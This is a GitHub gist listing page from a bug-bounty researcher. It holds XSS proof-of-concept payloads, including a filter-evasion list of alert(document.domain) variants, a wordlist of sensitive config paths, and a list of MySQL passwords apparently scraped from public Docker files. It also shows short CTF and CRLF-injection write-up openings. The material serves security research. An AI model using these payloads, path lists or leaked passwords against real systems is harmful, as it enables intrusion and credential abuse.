Skip to content

Instantly share code, notes, and snippets.

Avatar
☺️
Taking it easy

Tom Hudson tomnomnom

☺️
Taking it easy
9.7k followers · 137 following
View GitHub Profile
@tomnomnom
tomnomnom / intigriti-xss-may-2021
Created June 7, 2021 14:03
View intigriti-xss-may-2021
https://twitter.com/intigriti/status/1399317852788830211
[][`flat`][`constructor`]`alert(document.domain)```
`${e}` => [object HTMLProgressElement]
`${[]/[]}` => NaN
`${[][[]]}` => undefined
flat
constructor
@tomnomnom
tomnomnom / short-wordlist.txt
Created September 29, 2019 19:44
short-wordlist
View short-wordlist.txt
/.s3cfg
/phpunit.xml
/nginx.conf
/.vimrc
/LICENSE.md
/yarn.lock
/Gulpfile
/Gulpfile.js
/composer.json
/.npmignore
@tomnomnom
tomnomnom / passwords.txt
Last active February 25, 2023 20:34
MySQL Docker Passwords pulled from Dockerfile and docker-compose.yml files
View passwords.txt
0Z0mQ130F65E8wD
1QAZXsw2
3dodPaTXF5
5E84F90
5aQNxsB58752fNl
5ciuk1sy
5zkfAr9Y8k6qosP
8PuNNgp9wm2w
9Lug*96q
14mR00t
@tomnomnom
tomnomnom / gist:65322076999a30e463f24a502a59541f
Created July 8, 2019 13:45
These chars make gmail do funky stuff
View gist:65322076999a30e463f24a502a59541f
plain
𝅸𝅹𝅺󠀁󠀠󠀡󠀢󠀣󠀤󠀥󠀦󠀧󠀨󠀩󠀪󠀫󠀬󠀭󠀮󠀯󠀰󠀱󠀲󠀳󠀴󠀵󠀶󠀷󠀸󠀹󠀺󠀻󠀼󠀽󠀾󠀿󠁀󠁁󠁂󠁃󠁄󠁅󠁆󠁇󠁈󠁉󠁊󠁋󠁌󠁍󠁎󠁏󠁐󠁑󠁒󠁓󠁔󠁕󠁖󠁗󠁘󠁙󠁚󠁛󠁜󠁝󠁞󠁟󠁠󠁡󠁢󠁣󠁤󠁥󠁦󠁧󠁨󠁩󠁪󠁫󠁬󠁭󠁮󠁯󠁰󠁱󠁲󠁳󠁴󠁵󠁶￾
@tomnomnom
tomnomnom / google-copy.js
Created June 19, 2019 21:27
Bookmarklet to copy URLs from a Google search results page
View google-copy.js
javascript:d=document;b=d.createElement`textarea`;c=d.getSelection();b.textContent=[...d.querySelectorAll`div.r>a:first-child`].map(n=>n.href).join`\n`;d.body.appendChild(b);c.removeAllRanges();b.select();d.execCommand`copy`;d.body.removeChild(b)
@tomnomnom
tomnomnom / presentations.sh
Created June 7, 2019 09:01
presentations.sh
View presentations.sh
#!/bin/bash
dir=$1
if [ ! -d "$dir" ]; then
echo "no dir"
exit
fi
find "$dir" -type f -name "*.pdf" | sort | while read file; do
evince -s "$file"
@tomnomnom
tomnomnom / alert.js
Last active February 21, 2023 13:22
Ways to alert(document.domain)
View alert.js
// How many ways can you alert(document.domain)?
// Comment with more ways and I'll add them :)
// I already know about the JSFuck way, but it's too long to add (:
// Direct invocation
alert(document.domain);
(alert)(document.domain);
al\u0065rt(document.domain);
al\u{65}rt(document.domain);
window['alert'](document.domain);
@tomnomnom
tomnomnom / ctf-from-hell.md
Last active March 29, 2021 18:39
The CTF from \u000aHELL
View ctf-from-hell.md

The CTF from \u000aHELL

Chapter 1

IT WAS A DARK AND STORMY^w^w^w^w^w^wIt was a bright and sunny Tuesday afternoon. Tom had just arrived back at the office after a trip to down south. He'd been to a dinner in London; helping HackerOne give new and prospective customers advice on their bug bounty programs.

With the few emails he'd received responded to: he span in his chair, sipping at his coffee, wondering how to best to limber up his brain into 'work mode' after a night of free drinks. His aging neurons creaked and

@tomnomnom
tomnomnom / h1-barry-ctf-dump.php
Created August 13, 2017 08:36
Dump of the script I wrote solving Jobert's CTF (https://twitter.com/jobertabma/status/894066834927796224)
View h1-barry-ctf-dump.php
<?php
// OK, so here's the hex from the instructions...
$lines =<<<LINES
7b 0a 20 a0 22 65 76 e5
6e 74 22 ba 20 22 70 e1
73 73 77 ef 72 64 5f e3
68 61 6e e7 65 22 2c 8a
20 20 22 f5 73 65 72 ee
61 6d 65 a2 3a 20 22 e2
63 6f 6c ec 69 6e 22 ac
@tomnomnom
tomnomnom / php-curl-crlf-injection.mkd
Last active February 27, 2023 20:19
CRLF Injection Into PHP's cURL Options
View php-curl-crlf-injection.mkd

CRLF Injection Into PHP's cURL Options

I spent the weekend meeting hackers in Vegas, and I got talking to one of them about CRLF Injection. They'd not seen many CRLF Injection vulnerabilities in the wild, so I thought I'd write up an example that's similar to something I found a few months ago.

If you're looking for bugs legally through a program like hackerone, or you're a programmer wanting to write secure PHP: this might be useful to you.